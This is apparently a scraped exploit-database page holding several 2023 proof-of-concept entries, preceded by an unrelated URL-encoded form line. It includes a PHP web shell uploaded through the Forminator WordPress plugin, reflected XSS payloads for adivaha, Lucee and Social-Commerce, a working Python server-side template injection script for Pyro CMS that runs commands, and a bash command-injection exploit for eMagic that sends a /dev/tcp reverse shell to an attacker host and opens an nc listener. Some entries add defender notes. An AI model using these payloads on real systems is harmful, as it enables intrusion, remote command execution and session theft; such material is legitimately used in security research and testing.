we_transaction=73fee01822cc1e1b9ae2d7974583bb8e&we_cea6f7e60ce62be78e59f849855d2038_Filename=malas&we_cea6f7e60ce62be78e59f849855d2038_Extension=.svg&wetmp_we_cea6f7e60ce62be78e59f849855d2038_Extension=&we_cea6f7e60ce62be78e59f849855d2038_ParentPath=%2F&we_cea6f7e60ce62be78e59f849855d2038_ParentID=0&yuiAcContentTypeParentPath=&we_cea6f7e60ce62be78e59f849855d2038_IsSearchable=1&check_we_cea6f7e60ce62be78e59f849855d2038_IsSearchable=1&we_cea6f7e60ce62be78e59f849855d2038_IsProtected=0&fold%5B0%5D=0&fold_named%5BPropertyPage_2%5D=0&fold%5B1%5D=0&fold_named%5BPropertyPage_3%5D=0&wetmp_cea6f7e60ce62be78e59f849855d2038_CreatorID=%2Fadmin&we_cea6f7e60ce62be78e59f849855d2038_CreatorID=1&we_cea6f7e60ce62be78e59f849855d2038_RestrictOwners=0&we_complete_request=1
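  #!/usr/bin/env python3
# Exploit Title: Xlight FTP Server 3.9.3.6 - 'Stack Buffer Overflow' (DOS)
# Discovered by: Yehia Elghaly
# Discovered Date: 2023-08-04
# Vendor Homepage: https://www.xlightftpd.com/
# Software Link : https://www.xlightftpd.com/download/setup.exe
# Tested Version: 3.9.3.6
# Vulnerability Type: Buffer Overflow Local
# Tested on OS: Windows XP Professional SP3 - Windows 11 x64
# Description: Xlight FTP Server 3.9.3.6 'Execute Program' Buffer Overflow (PoC)
# Steps to reproduce:
#   1. Download and install Xlight FTP Server 3.9.3.6.
#   2. Run this script; it writes exploit.txt into the current directory.
#   3. Open Xlight FTP Server.
#   4. Go to "File and Directory -> Modify Virtual Server Configuration -> Advanced -> Misc -> Setup".
#   5. In "Execute a Program after user logged in", paste the contents of exploit.txt.
#   6. The application crashes.
#
# NOTE(review): this is a local denial-of-service PoC — the author's account
# is needed to reach the configuration dialog and only a crash is shown; no
# control of execution is demonstrated.

# 294 'A's is the length the author observed to crash the field in the tested build.
PAYLOAD_LENGTH = 294
exploit = "A" * PAYLOAD_LENGTH
OUTPUT_FILE = "exploit.txt"


def write_poc(path: str = OUTPUT_FILE, payload: str = exploit) -> bool:
    """Write *payload* to *path* and report the outcome on stdout.

    Returns True on success, False if the file could not be written. Only OS
    errors are caught (the original used a bare ``except`` that also swallowed
    KeyboardInterrupt).
    """
    try:
        with open(path, "w") as file:
            file.write(payload)
    except OSError as error:
        print(f"POC not created: {error}")
        return False
    print("POC is created")
    return True


if __name__ == "__main__":
    write_poc()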
  19. # Exploit Title: WordPress Plugin Forminator 1.24.6 - Unauthenticated Remote Command Execution # Date: 2023-07-20 # Exploit Author: Mehmet Kelepçe # Vendor Homepage: https://wpmudev.com/project/forminator-pro/ # Software Link: https://wordpress.org/plugins/forminator/ # Version: 1.24.6 # Tested on: PHP - Mysql - Apache2 - Windows 11 HTTP Request and vulnerable parameter: ------------------------------------------------------------------------- POST /3/wordpress/wp-admin/admin-ajax.php HTTP/1.1 Host: localhost Content-Length: 1756 sec-ch-ua: Accept: */* Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryTmsFfkbegmAjomne X-Requested-With: XMLHttpRequest sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.199 Safari/537.36 sec-ch-ua-platform: "" Origin: http://localhost Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://localhost/3/wordpress/2023/01/01/merhaba-dunya/ Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: wp-settings-time-1=1689794282; wordpress_test_cookie=WP%20Cookie%20check; wp_lang=tr_TR Connection: close . . . . . ------WebKitFormBoundaryTmsFfkbegmAjomne Content-Disposition: form-data; name="postdata-1-post-image"; filename="mehmet.php" Content-Type: application/octet-stream <?php $_GET['function']($_GET['cmd']); ?> Source Code: wp-content/plugins/forminator/library/modules/custom-forms/front/front-render.php: -------------------------------------------------------------------- public function has_upload() { $fields = $this->get_fields(); if ( ! empty( $fields ) ) { foreach ( $fields as $field ) { if ( 'upload' === $field['type'] || 'postdata' === $field['type'] ) { return true; } } } return false; } Vulnerable parameter: postdata-1-post-image and Source code: wp-content/plugins/forminator/library/fields/postdata.php: ------------------------------------------------------------------- if ( ! 
  empty( $post_image ) && isset( $_FILES[ $image_field_name ] ) ) { if ( isset( $_FILES[ $image_field_name ]['name'] ) && ! empty( $_FILES[ $image_field_name ]['name'] ) ) { $file_name = sanitize_file_name( $_FILES[ $image_field_name ]['name'] ); $valid = wp_check_filetype( $file_name ); if ( false === $valid['ext'] || ! in_array( $valid['ext'], $this->image_extensions ) ) { $this->validation_message[ $image_field_name ] = apply_filters( 'forminator_postdata_field_post_image_nr_validation_message', esc_html__( 'Uploaded file\'s extension is not allowed.', 'forminator' ), $id ); } } } Vulnerable variable: $image_field_name (the post-image upload field, named postdata-1-post-image in the request above). Note (review): the snippet only records a validation message when the extension is not in $this->image_extensions; for the .php upload to land on disk, that message must not stop the file from being stored — the code that actually saves the upload is not shown here and should be checked before relying on this analysis. ------------------------------------------------------------------------- Payload file: mehmet.php <?php $_GET['function']($_GET['cmd']); ?> (a minimal web shell: it calls whatever PHP function is named in ?function= with the argument given in ?cmd=, e.g. ?function=system&cmd=id) -------------------------------------------------------------------------
  20. # Exploit Title: WordPress adivaha Travel Plugin 2.3 - Reflected XSS # Exploit Author: CraCkEr # Date: 29/07/2023 # Vendor: adivaha - Travel Tech Company # Vendor Homepage: https://www.adivaha.com/ # Software Link: https://wordpress.org/plugins/adiaha-hotel/ # Demo: https://www.adivaha.com/demo/adivaha-online/ # Version: 2.3 # Tested on: Windows 10 Pro # Impact: Manipulate the content of the site ## Greetings The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka CryptoJob (Twitter) twitter.com/0x0CryptoJob ## Description An attacker who sends the victim a link containing a malicious URL (by email or instant message) can perform a wide variety of actions in the victim's browser, such as stealing the victim's session token or login credentials. Path: /mobile-app/v3/ GET parameter 'isMobile' is vulnerable to XSS (the same endpoint's 'pid' parameter is the SQL injection point reported separately) https://www.website/mobile-app/v3/?pid=77A89299&isMobile=[XSS] XSS Payload: clq95"><script>alert(1)</script>lb1ra [-] Done
  21. # Exploit Title: Adlisting Classified Ads 2.14.0 - WebPage Content Information Disclosure # Exploit Author: CraCkEr # Date: 25/07/2023 # Vendor: Templatecookie # Vendor Homepage: https://templatecookie.com/ # Software Link: https://templatecookie.com/demo/adlisting-classified-ads-script # Version: 2.14.0 # Tested on: Windows 10 Pro # Impact: Sensitive Information Leakage # CVE: CVE-2023-4168 ## Description Information disclosure in the redirect responses: when accessing any page on the website, configuration values such as API keys and app IDs are exposed in the body of these redirects, without authentication. ## Steps to Reproduce: Visit any page on the website, for example: https://website/ad-list?category=electronics https://website/ad-list-search?page=2 https://website/ad-list-search?keyword=&lat=&long=&long=&lat=&location=&category=&keyword= The page response body contains the following values: +---------------------+ google_map_key api_key auth_domain project_id storage_bucket messaging_sender_id app_id measurement_id +---------------------+ Review note: api_key, auth_domain, project_id, storage_bucket, messaging_sender_id, app_id and measurement_id together form a Firebase *web client* configuration, which Firebase documents as intended to ship to browsers; none of the listed fields is a server key. Their exposure is exploitable only if the project relies on key secrecy instead of Firebase security rules (or if a Cloud Messaging server key is also present), so verify that before rating severity. The google_map_key is abusable for quota theft unless it is restricted by HTTP referrer. Note: The same information leaked was entered in the "Firebase Push Notification Configuration" in the Administration Panel, at this path: https://website/push-notification (Login as Administrator) [-] Done
  22. # Exploit Title: Lucee 5.4.2.17 - Authenticated Reflected XSS # Google Dork: NA # Date: 05/08/2023 # Exploit Author: Yehia Elghaly # Vendor Homepage: https://www.lucee.org/ # Software Link: https://download.lucee.org/ # Version: << 5.4.2.17 # Tested on: Windows 10 # CVE: N/A Summary: Lucee is a light-weight dynamic CFML scripting language with a solid foundation. Lucee is a high-performance, open-source ColdFusion / CFML server engine, written in Java. Description: An attacker who is able to convince a victim to visit a malicious URL can perform a wide variety of actions, such as stealing the victim's session token or login credentials. The payload: ?msg=<img src=xss onerror=alert('xssya')> http://172.16.110.130:8888/lucee/admin/server.cfm?action=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%28%29%3E POST /lucee/admin/web.cfm?action=services.gateway&action2=create HTTP/1.1 Host: 172.16.110.130:8888 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 278 Origin: http://172.16.110.130:8888 Connection: close Referer: http://172.16.110.130:8888/lucee/admin/web.cfm?action=services.gateway&action2=create Cookie: cfid=ee75e255-5873-461d-a631-0d6db6adb066; cftoken=0; LUCEE_ADMIN_LANG=en; LUCEE_ADMIN_LASTPAGE=overview Upgrade-Insecure-Requests: 1 name=AsynchronousEvents&class=&cfcPath=lucee.extension.gateway.AsynchronousEvents&id=a&_id=a&listenerCfcPath=lucee.extension.gateway.AsynchronousEventsListener&startupMode=automatic&custom_component=%3Fmsg%3D%3Cimg+src%3Dxss+onerror%3Dalert%28%27xssya%27%29%3E&mainAction=submit [Affected Component] Debugging-->Template Service --> Search Services --> Event Gateway Service --> Logging
  23. # Exploit Title: Pyro CMS 3.9 - Server-Side Template Injection (SSTI) (Authenticated)
# Exploit Author: Daniel Barros (@cupc4k3d) - Hakai Offensive Security
# Date: 03/08/2023
# Vendor: https://pyrocms.com/
# Software Link: https://pyrocms.com/documentation/pyrocms/3.9/getting-started/installation
# Vulnerable Version(s): 3.9
# CVE: CVE-2023-29689
# Notes: You need a user who has access to /admin privilege
# Example Usage:
# First, run the script: python3 CVE-2023-29689.py
# Please follow these steps:
# 1. Enter the application URL: http://localhost:8000
# 2. Enter the email for authentication: admin@adm.com
# 3. Enter the password: Admin@@2023
# 4. Enter the command to be executed: id
# Result of command execution:
# uid=1000(cupcake) gid=1000(cupcake) groups=1000(cupcake)
#
# How it works (from the code below): with an authenticated admin session, role 1 is
# edited so that its English description holds a template expression of the form
# {{ ["<command>"]|map("system")|join }}; the roles listing page is then fetched and
# the rendered "Description" cell is read back as the command output.  Everything is
# plain HTTP against /admin/*, so it looks like ordinary admin activity in access logs.
#
# Defender notes:
#  - The expression is saved with action=save_exit, so it persists in the role record
#    after the script exits and is presumably re-evaluated whenever that description is
#    rendered (confirm against the CMS templates); restore role 1 during clean-up.
#  - Detection: audit/web logs showing a POST to /admin/users/roles/edit/<id> whose
#    description_en contains '{{', '|map(' or 'system', or role 1 being renamed to
#    'Admin' / slug 'admin' by a session that then fetches /admin/users/roles.
#  - Mitigation (NOTE(review), not verified against the vendor fix): apply the update
#    for CVE-2023-29689 and do not pass user-supplied role fields through the template
#    engine as template source.

import requests
from bs4 import BeautifulSoup
from urllib.parse import urljoin


def login(session: requests.Session, url: str, email: str, password: str) -> None:
    """Authenticate *session* against the /admin/login form.

    Fetches the login page, scrapes the hidden ``_token`` input (the form's CSRF
    token) and posts it together with *email* and *password*.  Nothing is
    returned and the response of the POST is discarded, so a failed login is
    not detected here.

    Raises:
        TypeError: if no ``<input name="_token">`` is found (``find`` returns
            ``None`` and the ``['value']`` lookup fails).
    """
    login_url = urljoin(url, '/admin/login')
    response = session.get(login_url)
    soup = BeautifulSoup(response.content, 'html.parser')
    # The CSRF token is taken from the served page, so the POST is
    # indistinguishable from a browser form submission in the server logs.
    token = soup.find('input', {'name': '_token'})['value']
    payload = {
        '_token': token,
        'email': email,
        'password': password
    }
    session.post(login_url, data=payload)


# Function to edit role 1 and extract the Description of the Admin user.
def edit_role_and_extract_description(session: requests.Session, url: str, command: str) -> str:
    """Overwrite role 1's description with a template expression and read back the rendered cell.

    Side effects: role 1 is saved with name ``Admin``, slug ``admin`` and a
    description embedding *command*; ``action=save_exit`` persists the change
    in the application's data store.

    Returns:
        The stripped text of the first ``<td data-title="Description">`` on the
        roles listing page, i.e. whatever the template engine rendered there.

    Raises:
        TypeError: if the ``_token`` input is missing from the edit page.
        AttributeError: if no description cell is found on the listing page.
    """
    edit_role_url = urljoin(url, '/admin/users/roles/edit/1')
    response = session.get(edit_role_url)
    soup = BeautifulSoup(response.content, 'html.parser')
    token = soup.find('input', {'name': '_token'})['value']
    payload = {
        '_token': token,
        'name_en': 'Admin',
        'slug': 'admin',
        # *command* is interpolated verbatim into a double-quoted template
        # string; the braces are doubled only to escape the f-string.
        'description_en': f'{{{{["{command}"]|map("system")|join}}}}',
        'action': 'save_exit'
    }
    session.post(edit_role_url, data=payload)

    # Extract the updated Description from role 1.
    # ``find`` returns the first matching cell on the listing page.
    response = session.get(urljoin(url, '/admin/users/roles'))
    soup = BeautifulSoup(response.content, 'html.parser')
    description = soup.find('td', {'data-title': 'Description'}).text.strip()
    return description


def main() -> None:
    """Interactive entry point: prompt for target, credentials and command, then run."""
    url = input("Enter the application URL: ")
    email = input("Enter the email for authentication: ")
    password = input("Enter the password : ")
    command = input("Enter the command to be executed: ")

    # A single Session carries the cookies set by login() into the later requests.
    with requests.Session() as session:
        login(session, url, email, password)
        description = edit_role_and_extract_description(session, url, command)
        print("\nResult of command execution:")
        print(description)


if __name__ == "__main__":
    main()
  24. #!/bin/bash
# Exploit Title: Emagic Data Center Management Suite v6.0 - OS Command Injection
# Date: 03-08-2023
# Exploit Author: Shubham Pandey & thewhiteh4t
# Vendor Homepage: https://www.esds.co.in/enlight360
# Version: 6.0.0
# Tested on: Kali Linux
# CVE : CVE-2023-37569
#
# What the script does (see the request built below): a single POST to
# /index.php/monitor/operations/utilities/ with utility=ping and a 'hostname'
# value that begins with an encoded ';' followed by a bash reverse-shell
# one-liner; a local listener is then started to wait for the connection.
#
# Defender notes:
#  - Detection: POST requests to that utilities endpoint whose 'hostname'
#    field contains shell metacharacters (%3B / ';', '|', '&&', '$(') or the
#    strings 'bash -i' / '/dev/tcp'; on the network side, an outbound TCP
#    connection from the management appliance to an unexpected host/port
#    shortly after such a request.
#  - Mitigation (NOTE(review), not verified against the vendor fix): validate
#    the hostname parameter against a strict hostname/IP character set and
#    run ping without passing the value through a shell.

URL=$1      # target base URL, e.g. http://<IP>
LHOST=$2    # address embedded in the payload for the connection back
LPORT=$3    # port embedded in the payload for the connection back

echo "*****************************"
echo "* ESDS eMagic 6.0.0 RCE *"
echo "* > CVE-2023-37569 *"
echo "* > Shubham & thewhiteh4t *"
echo "*****************************"

# Usage check runs after the banner; all three positional arguments are required.
if [ $# -lt 3 ]; then
    echo """
USAGE :
./exploit.sh http://<IP> <LHOST> <LPORT>
./exploit.sh http://192.168.0.10 192.168.0.20 1337
"""
    exit 1
fi

# Vulnerable endpoint (lower-case 'url' is what the curl call below uses).
url="$1/index.php/monitor/operations/utilities/"

echo "[+] URL : $URL"
echo "[+] LHOST : $LHOST"
echo "[+] LPORT : $LPORT"
echo

# URL-encoded bash reverse shell; LHOST/LPORT are substituted into it.
payload="bash%20%2Dc%20%27bash%20%2Di%20%3E%26%20%2Fdev%2Ftcp%2F$LHOST%2F$LPORT%200%3E%261%27"
# The 'hostname' field is the injection point: '%3B' (';') terminates the
# intended ping command and the payload follows it.  This form body is the
# signature to alert on.
post_data="utility=ping&operations=yes&hostname=%3B%20$payload&param_before=&param_after=&probe_id=1&rndval=1682490204846"

echo "[!] Triggering exploit..."
echo $url
# Delayed, backgrounded request so the listener below is already up when it fires.
(sleep 3; curl -s -X POST -d $post_data $url > /dev/null) &

echo "[+] Catching shell..."
# Local listener for the connection back.
nc -lvp 4444
  25. # Exploit Title: Social-Commerce 3.1.6 - Reflected XSS # Exploit Author: CraCkEr # Date: 28/07/2023 # Vendor: mooSocial # Vendor Homepage: https://moosocial.com/ # Software Link: https://social-commerce.moosocial.com/ # Version: 3.1.6 # Tested on: Windows 10 Pro # Impact: Manipulate the content of the site # CVE: CVE-2023-4174 ## Greetings The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka CryptoJob (Twitter) twitter.com/0x0CryptoJob ## Description An attacker who sends the victim a link containing a malicious URL, in an email or instant message, can perform a wide variety of actions, such as stealing the victim's session token or login credentials. Path: /search/index The GET parameter 'q' is vulnerable to XSS: https://website/search/index?q=[XSS] URL path segments 1 and 2 are vulnerable to XSS: https://website/stores[XSS]/all-products?store_id=&keyword=&price_from=&price_to=&rating=&store_category_id=&sortby=most_recent https://website/user_info[XSS]/index/friends https://website/user_info/index[XSS]/friends https://website/faqs[XSS]/index?content_search= https://website/faqs/index[XSS]?content_search= XSS Payloads: j8chn"><img src=a onerror=alert(1)>ridxm [-] Done